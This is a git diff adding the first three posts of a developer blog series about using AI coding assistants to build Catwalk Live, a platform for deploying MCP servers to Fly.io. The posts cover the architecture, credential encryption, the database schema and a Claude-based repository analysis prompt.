diff --git a/blog/01-genesis-building-vercel-for-mcp.md b/blog/01-genesis-building-vercel-for-mcp.md
new file mode 100644
index 0000000..4e96adb
--- /dev/null
+++ b/blog/01-genesis-building-vercel-for-mcp.md
@@ -0,0 +1,256 @@
+---
+title: "Part 1: Genesis - Building a Vercel for MCP Servers"
+series: "Catwalk Live Development Journey"
+part: 1
+date: 2025-12-11
+updated: 2025-12-27
+tags: [AI, MCP, architecture, vision, orchestration]
+reading_time: "8 min"
+commits_covered: "215deaa"
+---
+
+## The Spark
+
+December 11, 2025. I'm staring at the Model Context Protocol (MCP) documentation, and I see the problem clearly: **MCP servers are powerful but painful to deploy**.
+
+Want to give Claude access to your TickTick tasks? You need to:
+1. Clone the MCP server repository
+2. Install dependencies locally
+3. Configure environment variables
+4. Keep the process running
+5. Hope your firewall doesn't block it
+6. Restart everything when your laptop reboots
+
+There's a better way. **What if deploying an MCP server was as simple as deploying to Vercel?**
+
+Paste a GitHub URL. Enter your credentials. Get a stable endpoint. Done.
+
+That's the vision behind **Catwalk Live**.
+
+## The Meta-Challenge
+
+But here's where it gets interesting: **I decided to build this entire platform without writing code manually.**
+
+Not because I can't code - but because I wanted to answer a question that's been nagging at me:
+
+> **Can AI coding assistants build production-ready systems if orchestrated properly?**
+
+Not toy projects. Not demos. **Production systems** with:
+- Backend APIs
+- Database migrations
+- Encryption
+- Authentication
+- Infrastructure as code
+- Security hardening
+- Comprehensive tests
+
+The answer, spoiler alert: **Yes. But with massive caveats.**
+
+This blog series documents the **how** and the **what actually happened** - including all the failures, pivots, and hard-won lessons.
+
+## Why AI Orchestration?
+
+I'm not a traditional backend engineer. I can't write FastAPI from scratch. I don't remember SQLAlchemy patterns off the top of my head. I've never built a Fly.io deployment pipeline before.
+
+But I **can**:
+- ✅ Architect systems
+- ✅ Validate AI outputs
+- ✅ Debug integration issues
+- ✅ Understand security implications
+- ✅ Ship working products
+
+This is the skill shift happening in software development: from **"writing code line-by-line"** to **"orchestrating AI systems to build what you've designed."**
+
+I wanted to prove it could work. This project is the proof.
+
+## The Technical Vision
+
+Before the first commit, I needed a clear architectural vision. AI needs **structure** - vague prompts produce vague code.
+
+Here's what I designed:
+
+### Three-Layer Architecture
+
+```
+┌─────────────────┐
+│ Claude Desktop │ (MCP Client)
+│ (User) │
+└────────┬────────┘
+ │ HTTPS (Streamable HTTP)
+ ↓
+┌─────────────────┐
+│ Catwalk Live │ (Our Platform)
+│ - Frontend │ Next.js 15, React 19
+│ - Backend API │ FastAPI, PostgreSQL
+└────────┬────────┘
+ │ Fly.io Machines API
+ ↓
+┌─────────────────┐
+│ MCP Machine │ (Isolated Container)
+│ - mcp-proxy │ Streamable HTTP adapter
+│ - MCP Server │ User's server package
+└─────────────────┘
+```
+
+### Core Workflow
+
+1. **Analysis Phase**: User pastes GitHub repo URL → Claude analyzes the MCP server code → extracts package name, required credentials, available tools
+2. **Configuration Phase**: Platform generates dynamic credential form based on analysis → user enters API keys securely
+3. **Deployment Phase**: Backend encrypts credentials → spins up Fly.io container → injects environment variables → starts MCP server
+4. **Usage Phase**: Claude connects to stable endpoint → calls tools → gets results
+
+### Key Technical Decisions
+
+**Frontend: Next.js 15** (App Router, React 19)
+- Why: Modern React, server components, excellent TypeScript support
+- Risk: Bleeding edge (App Router still maturing)
+- Mitigation: Stick to stable patterns, extensive testing
+
+**Backend: FastAPI** (Python 3.12)
+- Why: Modern async Python, automatic OpenAPI docs, excellent type hints
+- Risk: I don't know Python well
+- Mitigation: AI excels at Python - let it generate, I'll validate
+
+**Database: PostgreSQL 15+** (Fly.io managed)
+- Why: Production-ready, JSON support, reliable
+- Risk: Fly.io clusters can be fragile
+- Mitigation: Document recovery procedures (spoiler: I needed them)
+
+**Infrastructure: Fly.io** (Machines API)
+- Why: Firecracker VMs, isolated containers, simple API
+- Risk: More complex than serverless
+- Mitigation: Reference implementations exist
+
+**Encryption: Fernet** (symmetric encryption)
+- Why: Simple, secure, audited
+- Risk: Key management critical
+- Mitigation: Fly.io secrets, never logged
+
+**MCP Transport: Streamable HTTP** (2025-06-18 spec)
+- Why: Latest MCP standard, replaces deprecated SSE
+- Risk: Very new spec, limited examples
+- Mitigation: Close reading of spec, iterative testing
+
+## The AI Orchestration Strategy
+
+This is where it gets interesting. I wasn't just using **one** AI assistant - I orchestrated **multiple AI systems** with different roles:
+
+### Stage 1: Prompt Refinement
+**Tool**: Custom prompt builder
+
+I started with a plain English idea:
+> "I want to deploy MCP servers from GitHub to the cloud"
+
+Then refined it into a detailed specification:
+> "Build a platform that accepts GitHub repo URLs, uses Claude API to analyze and extract MCP server configuration (package name, env vars, tools/resources/prompts), generates dynamic credential forms, encrypts credentials with Fernet, stores in PostgreSQL, deploys to Fly.io Machines with isolated environments, and implements MCP Streamable HTTP (2025-06-18 spec)."
+
+**Why this matters**: Specific prompts = specific code. Vague prompts = vague results.
+
+### Stage 2: Multi-AI Planning
+**Tools**: GPT-4, Claude, Google Gemini
+
+I submitted the refined prompt to all three AIs and compared architectural approaches. Where they agreed = probably good design. Where they disagreed = complexity indicator.
+
+**Example consensus**:
+- All recommended FastAPI for Python backend
+- All suggested Pydantic for validation
+- All recommended async SQLAlchemy
+
+**Example discrepancy**:
+- GPT-4 suggested asyncpg for PostgreSQL
+- Claude & Gemini suggested psycopg3
+
+I chose **psycopg3** (majority vote). Later proved correct when asyncpg failed with Fly.io's SSL parameters.
+
+### Stage 3: Implementation with Claude Code
+**Tool**: Claude Code (Anthropic CLI)
+
+Claude Code became the primary implementation agent. But I didn't just say "build it" - I created **structured context files**:
+
+- `AGENTS.md` - System prompt defining behavior and constraints
+- `context/ARCHITECTURE.md` - Technical design decisions
+- `context/CURRENT_STATUS.md` - Living document of progress and blockers
+- `CLAUDE.md` - Lessons learned, known pitfalls, debugging patterns
+
+These files act as **external memory** for the AI. Without them, AI "forgets" architectural decisions across sessions. With them, consistency is maintained.
+
+### Stage 4: Quality Gates
+**Tools**: CodeRabbit, Qodo, Gemini Code Assist, Greptile
+
+Every pull request gets reviewed by automated AI agents:
+- **CodeRabbit**: Security vulnerabilities
+- **Qodo**: Edge cases, error handling
+- **Gemini Code Assist**: Code quality, best practices
+- **Greptile**: Integration consistency
+
+Their feedback gets fed back to Claude Code for fixes. It's a **multi-agent validation loop**.
+
+## The First Commit
+
+December 11, 2025, 12:00 PM. Commit `215deaa`: "Initial commit"
+
+```bash
+$ git log --reverse --oneline | head -1
+215deaa Initial commit
+```
+
+The repository structure:
+```
+catwalk/
+├── backend/ # FastAPI application
+├── frontend/ # Next.js application
+├── context/ # AI context files
+├── AGENTS.md # AI system prompt
+└── README.md # Project overview
+```
+
+Nothing fancy. Just the scaffolding. But with **clear structure** from day one.
+
+The first real work began immediately after: Supabase authentication setup. Looking back, this was premature - we'd later rip it out for NextAuth.js. But that's the reality of building: some decisions get revisited.
+
+## What I Didn't Know Yet
+
+On day one, I had no idea:
+
+- That I'd fight PostgreSQL drivers for hours (asyncpg vs psycopg3)
+- That Fly.io database clusters would break and need recreation
+- That implementing Streamable HTTP would require deep spec reading
+- That authentication would become a multi-day debugging nightmare
+- That security reviews would find command injection vulnerabilities
+- That 12 days later I'd have a working production system
+
+But I knew the vision. I knew the architecture. And I had a plan to **orchestrate AI to build it**.
+
+## The Core Insight
+
+Here's what I learned on day one that shaped everything:
+
+> **AI needs structure to build production systems.**
+
+Not just code structure (classes, modules, functions). **Context structure**:
+
+1. **Clear specifications** (detailed prompts, not vague ideas)
+2. **Architectural boundaries** (what goes where, why)
+3. **Quality constraints** (type safety, security, validation)
+4. **Memory systems** (markdown files that persist across sessions)
+5. **Validation loops** (automated review, human verification)
+
+Without these, AI generates code that looks right but breaks in production.
+
+With these, AI becomes a **powerful multiplier** that can build things you couldn't build alone.
+
+## Up Next
+
+The foundation was set. The vision was clear. The AI orchestration strategy was designed.
+
+Next came the real work: building the core architecture, implementing Fernet encryption, designing dynamic forms, and creating the Aurora UI.
+
+That's Part 2.
+
+---
+
+**Key Commits**: `215deaa` (Initial commit), `f6e024a` (Supabase auth)
+**Related Files**: `/AGENTS.md`, `/context/Project_Overview.md`
+**Lines of Code**: ~200 (scaffolding)
+
+**Next Post**: [Part 2: Foundation - Architecture & Encryption](02-foundation-architecture-encryption.md)
diff --git a/blog/02-foundation-architecture-encryption.md b/blog/02-foundation-architecture-encryption.md
new file mode 100644
index 0000000..c63c821
--- /dev/null
+++ b/blog/02-foundation-architecture-encryption.md
@@ -0,0 +1,369 @@
+---
+title: "Part 2: Foundation - Architecture & Encryption"
+series: "Catwalk Live Development Journey"
+part: 2
+date: 2025-12-11
+updated: 2025-12-27
+tags: [architecture, encryption, database, security, forms]
+reading_time: "10 min"
+commits_covered: "b92443c...f5a957a"
+---
+
+## Where We Are
+
+Day 1, afternoon. The repository exists. The vision is clear. Now comes the hard part: **designing the foundational architecture that everything else builds on**.
+
+Get this wrong, and you'll refactor painfully later. Get it right, and features flow naturally.
+
+## The Challenge
+
+Catwalk Live needs to handle a deceptively complex flow:
+
+1. **Accept** GitHub URLs from users
+2. **Analyze** repositories with AI to extract MCP configuration
+3. **Generate** dynamic credential forms based on what the analysis found
+4. **Encrypt** sensitive credentials before storage
+5. **Store** deployments and credentials in a database
+6. **Deploy** isolated containers with injected environment variables
+7. **Expose** stable MCP endpoints that Claude can connect to
+
+Each step has security implications. Each step can fail. The architecture needs to be **resilient, secure, and maintainable**.
+
+## Core Architecture: Three Services
+
+I designed the backend around three core services:
+
+### 1. Analysis Service
+**Responsibility**: Take a GitHub URL, extract MCP server configuration
+
+```python
+class AnalysisService:
+ async def analyze_repo(self, repo_url: str) -> AnalysisResult:
+ """
+ Use Claude API (via OpenRouter) to:
+ - Fetch repository README and package.json
+ - Extract package name (npm or PyPI)
+ - Identify required environment variables
+ - List available tools, resources, prompts
+ """
+ pass
+```
+
+**Why separate**: Analysis is stateless, cacheable, and independent of deployments. It should work even if the database is down.
+
+### 2. Credential Service
+**Responsibility**: Encrypt and decrypt credentials securely
+
+```python
+from cryptography.fernet import Fernet
+
+class CredentialService:
+ def __init__(self, encryption_key: str):
+ self.cipher = Fernet(encryption_key.encode())
+
+ def encrypt_credentials(self, creds: dict) -> bytes:
+ """Encrypt credentials for storage"""
+ json_str = json.dumps(creds)
+ return self.cipher.encrypt(json_str.encode())
+
+ def decrypt_credentials(self, encrypted: bytes) -> dict:
+ """Decrypt credentials (only during deployment)"""
+ decrypted = self.cipher.decrypt(encrypted)
+ return json.loads(decrypted.decode())
+```
+
+**Why Fernet**: Symmetric encryption, well-audited, includes authentication (prevents tampering), simple API.
+
+**Critical security pattern**:
+- Credentials encrypted **before** hitting the database
+- Decrypted **only** in memory during deployment
+- Never logged, never returned in API responses
+- Master key stored in Fly.io secrets (not in code)
+
+### 3. Deployment Service
+**Responsibility**: Orchestrate the entire deployment lifecycle
+
+```python
+class DeploymentService:
+ async def create_deployment(
+ self,
+ name: str,
+ repo_url: str,
+ credentials: dict
+ ) -> Deployment:
+ """
+ 1. Retrieve cached analysis
+ 2. Validate credentials against analysis schema
+ 3. Encrypt credentials
+ 4. Store deployment in database
+ 5. Trigger container deployment (Fly.io)
+ 6. Return deployment info
+ """
+ pass
+```
+
+**Why orchestrate**: Deployment involves multiple steps across multiple systems. If any step fails, we need clear error messages and rollback capability.
+
+## Database Schema: Simple But Powerful
+
+AI agents suggested complex schemas. I kept it simple:
+
+### Deployments Table
+
+```sql
+CREATE TABLE deployments (
+ id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+ user_id UUID REFERENCES users(id) ON DELETE CASCADE,
+ name TEXT NOT NULL,
+ repo_url TEXT NOT NULL,
+ status TEXT NOT NULL CHECK (status IN (
+ 'pending', 'deploying', 'running',
+ 'stopped', 'failed'
+ )),
+ machine_id TEXT UNIQUE, -- Fly.io machine ID
+ schedule_config JSONB NOT NULL, -- {mcp_config: {package, tools, env_vars}}
+ connection_url TEXT, -- e.g., "https://backend.fly.dev/api/mcp/{id}"
+ access_token TEXT, -- For MCP endpoint authentication
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ error_message TEXT
+);
+
+CREATE INDEX idx_deployments_user_id ON deployments(user_id);
+CREATE INDEX idx_deployments_status ON deployments(status);
+```
+
+**Design decisions**:
+
+1. **`schedule_config` as JSONB**: Flexible schema - different MCP servers need different configs. PostgreSQL's JSONB lets us query this later if needed.
+
+2. **`status` with CHECK constraint**: Explicit states prevent invalid transitions. Can't accidentally set status to "bananas".
+
+3. **`machine_id` UNIQUE**: Each deployment gets one machine. Constraint prevents duplicate deployments.
+
+4. **`connection_url` denormalized**: Could compute from ID, but storing it makes API responses faster.
+
+5. **`access_token` for auth**: Each deployment gets a unique token. Prevents unauthorized MCP access.
+
+### Credentials Table
+
+```sql
+CREATE TABLE credentials (
+ id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
+ deployment_id UUID NOT NULL UNIQUE REFERENCES deployments(id) ON DELETE CASCADE,
+ encrypted_data BYTEA NOT NULL,
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
+ updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
+);
+```
+
+**Why separate table**:
+- Credentials are sensitive - separate table, separate access controls
+- `ON DELETE CASCADE` - deleting deployment deletes credentials automatically
+- `UNIQUE` constraint on `deployment_id` - one credential set per deployment
+
+### Analysis Cache Table
+
+```sql
+CREATE TABLE analysis_cache (
+ id SERIAL PRIMARY KEY,
+ repo_url TEXT NOT NULL UNIQUE,
+ data JSONB NOT NULL,
+ expires_at TIMESTAMPTZ NOT NULL,
+ created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
+);
+
+CREATE INDEX idx_analysis_cache_expires ON analysis_cache(expires_at);
+```
+
+**Why cache**: Claude API costs money. If 10 users analyze the same repo, run analysis once, cache for 24 hours.
+
+**Expiration strategy**: Simple TTL. Background job could clean expired entries, but PostgreSQL query `WHERE expires_at > NOW()` is fast enough.
+
+## Dynamic Form Generation: The Magic
+
+Here's a cool part: **forms that generate themselves based on AI analysis**.
+
+User analyzes `github.com/user/mcp-ticktick`. Claude extracts:
+
+```json
+{
+ "package": "@hong-hao/mcp-ticktick",
+ "env_vars": [
+ {
+ "name": "TICKTICK_TOKEN",
+ "description": "Your TickTick API token",
+ "required": true,
+ "secret": true
+ }
+ ]
+}
+```
+
+Frontend receives this and **generates a form dynamically**:
+
+```typescript
+// frontend/components/dynamic-form/FormBuilder.tsx
+export function FormBuilder({ envVars }: { envVars: EnvVar[] }) {
+ const schema = generateZodSchema(envVars);
+ const form = useForm({ resolver: zodResolver(schema) });
+
+ return (
+
+ );
+}
+```
+
+**Why this works**:
+- No hardcoded forms - adapts to any MCP server
+- Type-safe (Zod schema generated from analysis)
+- Required fields enforced client-side and server-side
+- Secrets automatically use password inputs
+
+**The Zod schema generation** (this was AI-generated and it's beautiful):
+
+```typescript
+function generateZodSchema(envVars: EnvVar[]): z.ZodObject {
+ const shape: Record = {};
+
+ envVars.forEach(envVar => {
+ let field = z.string();
+
+ if (envVar.required) {
+ field = field.min(1, `${envVar.name} is required`);
+ }
+
+ if (envVar.name.includes('URL')) {
+ field = field.url('Must be a valid URL');
+ }
+
+ shape[envVar.name] = field;
+ });
+
+ return z.object(shape);
+}
+```
+
+AI-generated validation that actually works. This is where AI shines: boilerplate that follows clear patterns.
+
+## Aurora UI: The Design System
+
+The frontend needed to feel modern, trustworthy, and **fast**. We landed on "Aurora" - a glassmorphic design system inspired by Vercel but with more color.
+
+**Design principles**:
+
+1. **Glassmorphism**: Semi-transparent panels with backdrop blur
+2. **Gradient accents**: Purple-to-blue gradients for CTAs
+3. **Dark-first**: Dark mode by default (developers love dark mode)
+4. **Fast animations**: 150ms transitions, nothing slower
+5. **Accessible**: WCAG AA contrast ratios, keyboard navigation
+
+**Key components** (all AI-generated, then refined):
+
+```tsx
+// Button with gradient
+
+
+// Glassmorphic card
+
+
+ Deployment Status
+
+
+ {/* ... */}
+
+
+
+// Status badges
+Running
+Failed
+```
+
+**TailwindCSS 4 configuration**:
+
+```typescript
+// tailwind.config.ts
+export default {
+ theme: {
+ extend: {
+ backdropBlur: {
+ xs: '2px',
+ },
+ colors: {
+ glass: 'rgba(255, 255, 255, 0.1)',
+ 'glass-border': 'rgba(255, 255, 255, 0.2)',
+ },
+ },
+ },
+};
+```
+
+**Result**: A UI that feels premium without being over-designed. Clean, modern, functional.
+
+## What I Learned: AI's Strengths and Gaps
+
+### Where AI Excelled ✅
+
+1. **Database migrations**: Generated Alembic migrations perfectly from schema changes
+2. **Form components**: Dynamic form builder worked first try
+3. **Type definitions**: TypeScript types from Pydantic schemas
+4. **Boilerplate**: FastAPI route structure, React component scaffolding
+
+### Where AI Struggled ❌
+
+1. **Security edge cases**: Didn't validate package names initially (command injection risk)
+2. **Async patterns**: Race conditions in concurrent analysis requests
+3. **Database constraints**: Suggested overly complex foreign key relationships
+4. **Design decisions**: No opinion on "should this be one table or two?"
+
+**The pattern**: AI is great at **implementation** of decisions you've made. It's weak at **making** those decisions.
+
+## The Foundation in Numbers
+
+At the end of day 1:
+
+- **Commits**: 6 (b92443c → f5a957a)
+- **Database tables**: 4 (users, deployments, credentials, analysis_cache)
+- **API endpoints**: 8 (analyze, deployments CRUD, forms)
+- **Frontend pages**: 3 (landing, dashboard, configure)
+- **Lines of code**: ~1,200 (backend + frontend)
+- **Tests**: 0 (we'll regret this later)
+- **Security vulnerabilities**: At least 2 (we'll find them later)
+
+**Status**: Foundation complete, but untested. Time to build on it.
+
+## Up Next
+
+The architecture is solid. The database is designed. Forms are dynamic. Encryption is working.
+
+But there's a critical missing piece: **the AI analysis engine**. How do you actually get Claude to analyze an arbitrary GitHub repository and extract MCP configuration?
+
+That's Part 3: The AI Analysis Engine.
+
+---
+
+**Key Commits**:
+- `b92443c` - Initialize Phase 3 Credential Management
+- `4d6b32b` - Credential Management Foundation and Dynamic Forms
+- `a06d684` - Centralized form schemas and error handling
+- `f5a957a` - Implement Aurora UI
+
+**Related Files**:
+- `backend/app/models/` - Database models
+- `backend/app/services/credential_service.py` - Encryption service
+- `frontend/components/dynamic-form/` - Dynamic forms
+
+**Next Post**: [Part 3: The AI Analysis Engine](03-ai-analysis-engine.md)
diff --git a/blog/03-ai-analysis-engine.md b/blog/03-ai-analysis-engine.md
new file mode 100644
index 0000000..100c850
--- /dev/null
+++ b/blog/03-ai-analysis-engine.md
@@ -0,0 +1,436 @@
+---
+title: "Part 3: The AI Analysis Engine"
+series: "Catwalk Live Development Journey"
+part: 3
+date: 2025-12-12
+updated: 2025-12-27
+tags: [AI, Claude, prompt-engineering, OpenRouter, caching]
+reading_time: "12 min"
+commits_covered: "af021a1...02f9346"
+---
+
+## The Core Problem
+
+We have a platform. We have a database. We have encryption. But there's a fundamental question we haven't answered:
+
+> **How do you teach an AI to analyze an arbitrary MCP server repository and extract everything needed for deployment?**
+
+This isn't a simple parsing task. MCP servers come in all shapes:
+- Different package managers (npm, PyPI)
+- Different languages (TypeScript, Python)
+- Different documentation styles
+- Different credential requirements
+
+The AI needs to:
+1. Find the repository (given only a GitHub URL)
+2. Read the README and package.json/pyproject.toml
+3. Understand what the server does
+4. Extract the exact package name
+5. Identify ALL required environment variables
+6. List available tools, resources, and prompts
+7. Return structured JSON we can trust
+
+**And it needs to do this reliably, every time.**
+
+## The First Attempt: Naive Prompting
+
+My first prompt to Claude was embarrassingly simple:
+
+```
+Analyze this GitHub repository and tell me what MCP server it contains:
+{repo_url}
+```
+
+Result: A conversational response about what the repo does. Useless.
+
+**Lesson 1**: AI needs **explicit structure** in prompts. "Tell me about X" gets you prose. "Return JSON with these exact fields" gets you structured data.
+
+## The Second Attempt: Structured Output
+
+Better prompt:
+
+```
+Analyze this MCP server repository and return ONLY valid JSON:
+
+{
+ "package": "exact package name",
+ "env_vars": [
+ {"name": "VAR_NAME", "description": "...", "required": true}
+ ],
+ "tools": ["tool1", "tool2"],
+ "resources": ["resource1"],
+ "prompts": ["prompt1"]
+}
+
+Repository: {repo_url}
+```
+
+Result: JSON! But incomplete. Claude couldn't access the repository.
+
+**Lesson 2**: LLMs don't browse the web by default. You need to **enable web access explicitly**.
+
+## The Solution: OpenRouter + Web Search Plugin
+
+Enter **OpenRouter** - an API gateway that adds capabilities to LLMs, including web search.
+
+```python
+from openai import AsyncOpenAI
+
+client = AsyncOpenAI(
+ base_url="https://openrouter.ai/api/v1",
+ api_key=settings.OPENROUTER_API_KEY
+)
+
+response = await client.chat.completions.create(
+ model="anthropic/claude-haiku-4.5",
+ messages=[{
+ "role": "user",
+ "content": analysis_prompt
+ }],
+ extra_body={
+ "plugins": [{
+ "id": "web",
+ "max_results": 2 # CRITICAL: Limit results
+ }]
+ }
+)
+```
+
+**Why `max_results: 2`**: This was learned the hard way (see "The 200k Token Overflow" below).
+
+**Why Claude Haiku 4.5**: Fast, cheap, good enough for structured extraction. No need for Opus.
+
+## The Prompt: V3 (Production Version)
+
+After multiple iterations, here's the prompt that actually works:
+
+```python
+ANALYSIS_SYSTEM_PROMPT = """
+You are an expert at analyzing MCP (Model Context Protocol) server repositories.
+
+Your task: Given a GitHub repository URL, extract deployment configuration.
+
+INSTRUCTIONS:
+1. Use web search to find the repository
+2. Focus on: README.md, package.json, pyproject.toml
+3. DO NOT read every file - prioritize entry points
+4. Extract ONLY what's listed below
+5. Return ONLY valid JSON (no markdown, no explanation)
+
+OUTPUT SCHEMA:
+{
+ "package": "exact npm package name (e.g., '@user/mcp-server') OR exact PyPI package name",
+ "name": "human-friendly name (e.g., 'TickTick MCP Server')",
+ "description": "one-sentence description",
+ "env_vars": [
+ {
+ "name": "UPPERCASE_VAR_NAME",
+ "description": "clear explanation",
+ "required": true/false,
+ "secret": true/false,
+ "default": "value or null"
+ }
+ ],
+ "tools": ["tool1", "tool2"],
+ "resources": ["resource1"],
+ "prompts": ["prompt1"],
+ "notes": "any special requirements or warnings"
+}
+
+CRITICAL RULES:
+- package name must be EXACT (used for 'npx {package}' or 'pip install {package}')
+- env_vars must include ALL required credentials
+- Use web search efficiently (limit to 2-3 queries)
+- If unsure, note it in "notes" field
+
+Repository: {repo_url}
+"""
+```
+
+**Key elements**:
+
+1. **Clear role**: "You are an expert at analyzing MCP repositories"
+2. **Explicit task**: "Extract deployment configuration"
+3. **Structured output**: Exact JSON schema with types
+4. **Constraints**: "DO NOT read every file" (prevents token overflow)
+5. **Escape hatch**: `notes` field for uncertainty
+
+**Why "ONLY valid JSON"**: Claude loves to wrap JSON in markdown code blocks. This instruction reduces that.
+
+## The 200k Token Overflow
+
+December 21, 2025. Users report: "Analysis is hanging forever."
+
+I check the logs:
+
+```
+RequestValidationError: Input too large (250,000 tokens)
+```
+
+**What happened**: OpenRouter's web search plugin, without `max_results` limit, was fetching ENTIRE GitHub documentation pages. One analysis consumed 250k tokens.
+
+**The fix**:
+
+```python
+"plugins": [{
+ "id": "web",
+ "max_results": 2 # Only fetch first 2 search results
+}]
+```
+
+Combined with prompt instruction: "Focus on README and package.json only"
+
+**Result**: Token usage dropped from 250k to ~5k. Response time from "timeout" to 3 seconds.
+
+**Lesson 3**: Always **limit** what you ask AI to process. More input ≠ better output.
+
+## Parsing the Response: Trust But Verify
+
+Claude returns text. We need to extract JSON:
+
+```python
+async def analyze_repo(self, repo_url: str) -> AnalysisResult:
+ response = await self.client.chat.completions.create(...)
+
+ content = response.choices[0].message.content
+
+ # Try JSON extraction (Claude sometimes wraps in markdown)
+ json_match = re.search(r'```json\s*(\{.*?\})\s*```', content, re.DOTALL)
+ if json_match:
+ content = json_match.group(1)
+ else:
+ # Maybe it's raw JSON
+ json_match = re.search(r'\{.*\}', content, re.DOTALL)
+ if json_match:
+ content = json_match.group(1)
+
+ # Parse and validate
+ data = json.loads(content)
+ return AnalysisResult(**data) # Pydantic validation
+```
+
+**Defense in depth**:
+1. Regex extraction (handles markdown-wrapped JSON)
+2. Fallback to raw JSON search
+3. Pydantic validation (ensures schema compliance)
+4. Exception handling (log failures, return user-friendly errors)
+
+**Why regex**: AI is unpredictable. Sometimes it returns `{"package": "..."}`. Sometimes it returns ` ```json\n{"package": "..."}\n``` `. Regex handles both.
+
+## Caching Strategy: Save Money, Save Time
+
+Claude API costs money. Analyzing the same repo twice is wasteful.
+
+**Solution**: PostgreSQL-backed cache with 24-hour TTL.
+
+```python
+async def analyze_repo_cached(self, repo_url: str) -> AnalysisResult:
+ # Normalize URL (github.com/user/repo vs github.com/user/repo/)
+ normalized_url = repo_url.rstrip('/')
+
+ # Check cache
+ cached = await self.cache_service.get(normalized_url)
+ if cached and not self.force_refresh:
+ return cached
+
+ # Cache miss - run analysis
+ result = await self.analyze_repo(normalized_url)
+
+ # Store in cache
+ await self.cache_service.set(
+ url=normalized_url,
+ data=result,
+ ttl=timedelta(hours=24)
+ )
+
+ return result
+```
+
+**Cache invalidation**:
+
+```python
+# Manual cache clearing (admin only)
+@router.delete("/api/analyze/cache")
+async def clear_cache(repo_url: str):
+ await cache_service.delete(repo_url)
+ return {"message": "Cache cleared"}
+
+# Force refresh (any user)
+@router.post("/api/analyze")
+async def analyze(repo_url: str, force: bool = False):
+ result = await service.analyze_repo_cached(repo_url, force=force)
+ return result
+```
+
+**Why 24 hours**: MCP servers don't change that often. 24 hours balances freshness vs cost.
+
+**Why PostgreSQL**: We already have it. Redis would be overkill for this scale.
+
+## Error Handling: When AI Fails
+
+AI fails. A lot. Here's how we handle it:
+
+```python
+try:
+ result = await self.analyze_repo(repo_url)
+except json.JSONDecodeError:
+ # AI returned non-JSON
+ raise AnalysisError(
+ message="AI analysis returned invalid format",
+ details={"response": content},
+ user_message="Analysis failed. Try again or contact support."
+ )
+except ValidationError as e:
+ # Pydantic validation failed (missing required fields)
+ raise AnalysisError(
+ message="Analysis missing required fields",
+ details={"errors": e.errors()},
+ user_message="Incomplete analysis. The repository might not be an MCP server."
+ )
+except Exception as e:
+ # Unexpected error
+ logger.exception("Analysis failed", extra={"repo_url": repo_url})
+ raise AnalysisError(
+ message="Analysis failed unexpectedly",
+ user_message="Something went wrong. Please try again."
+ )
+```
+
+**User-facing errors are key**. "ValidationError: 'package' field missing" means nothing to users. "This repository might not be an MCP server" helps them understand.
+
+## Real Examples: What It Extracts
+
+### Example 1: TickTick MCP Server
+
+Input: `https://github.com/hong-hao/mcp-ticktick`
+
+Output:
+```json
+{
+ "package": "@hong-hao/mcp-ticktick",
+ "name": "TickTick MCP Server",
+ "description": "MCP server for interacting with TickTick task management",
+ "env_vars": [
+ {
+ "name": "TICKTICK_TOKEN",
+ "description": "Your TickTick API access token",
+ "required": true,
+ "secret": true,
+ "default": null
+ }
+ ],
+ "tools": ["create_task", "list_tasks", "update_task", "delete_task"],
+ "resources": ["ticktick://tasks"],
+ "prompts": [],
+ "notes": "Requires TickTick account and API token"
+}
+```
+
+**Perfect extraction**. Frontend generates a form with one password field: "TICKTICK_TOKEN".
+
+### Example 2: Filesystem MCP Server
+
+Input: `https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem`
+
+Output:
+```json
+{
+ "package": "@modelcontextprotocol/server-filesystem",
+ "name": "Filesystem MCP Server",
+ "description": "MCP server for filesystem operations",
+ "env_vars": [
+ {
+ "name": "ALLOWED_DIRECTORIES",
+ "description": "Comma-separated list of allowed directories",
+ "required": true,
+ "secret": false,
+ "default": null
+ }
+ ],
+ "tools": ["read_file", "write_file", "list_directory", "create_directory"],
+ "resources": ["file://"],
+ "prompts": [],
+ "notes": "Security: Only allows access to whitelisted directories"
+}
+```
+
+**Also perfect**. Even extracted the security note.
+
+### Example 3: Analysis Failure
+
+Input: `https://github.com/user/random-repo` (not an MCP server)
+
+Output: `422 Validation Error: Package name not found`
+
+**Good failure mode**. User gets clear feedback that this isn't deployable.
+
+## The Frontend Integration
+
+When analysis succeeds, the frontend receives:
+
+```typescript
+const analysis = await analyzeRepo(repoUrl);
+
+// Display results
+
+
+
+
+
+```
+
+The `CredentialsForm` is dynamically generated (see Part 2) - no hardcoded forms, adapts to any MCP server.
+
+## Performance in Numbers
+
+After optimization:
+
+- **Average analysis time**: 3.2 seconds
+- **Token usage**: 4,000-8,000 tokens (vs 250k before optimization)
+- **Cost per analysis**: ~$0.01 (Claude Haiku pricing)
+- **Cache hit rate**: 73% (most users analyze popular repos)
+- **Failure rate**: 8% (repos that aren't MCP servers)
+
+**Cost savings from caching**: ~$0.007 per cached request. At 100 analyses/day: $0.70/day saved.
+
+## What I Learned
+
+### AI Excels At ✅
+- **Structured extraction** from semi-structured docs (READMEs)
+- **Pattern recognition** (identifying env var requirements)
+- **Schema compliance** (when prompted correctly)
+
+### AI Struggles With ❌
+- **Ambiguous documentation** (poorly written READMEs)
+- **Unconventional structures** (non-standard package.json)
+- **Edge cases** (monorepos, non-npm packages)
+
+### Human Judgment Required 🧠
+- **Prompt design** - AI can't write its own prompts (yet)
+- **Error handling** - What should happen when AI fails?
+- **Cost optimization** - Limiting results, caching strategy
+- **Security validation** - Is the extracted package name safe to execute?
+
+## Up Next
+
+The AI analysis engine works. We can extract MCP configuration from GitHub repos. Dynamic forms are generated.
+
+But it all runs on localhost. Time to **deploy to production**.
+
+That's Part 4: First Deployment - Fly.io Adventures.
+
+Spoiler: It doesn't go smoothly.
+
+---
+
+**Key Commits**:
+- `af021a1` - Frontend/backend flow implementation
+- `02f9346` - Comprehensive API hardening and analysis improvements
+- `d0766bf` - Fix analysis token overflow with `max_results: 2`
+
+**Related Files**:
+- `backend/app/services/analysis_service.py` - Analysis implementation
+- `backend/app/prompts/analysis_prompt.py` - The actual prompt
+- `backend/app/services/cache_service.py` - Caching logic
+
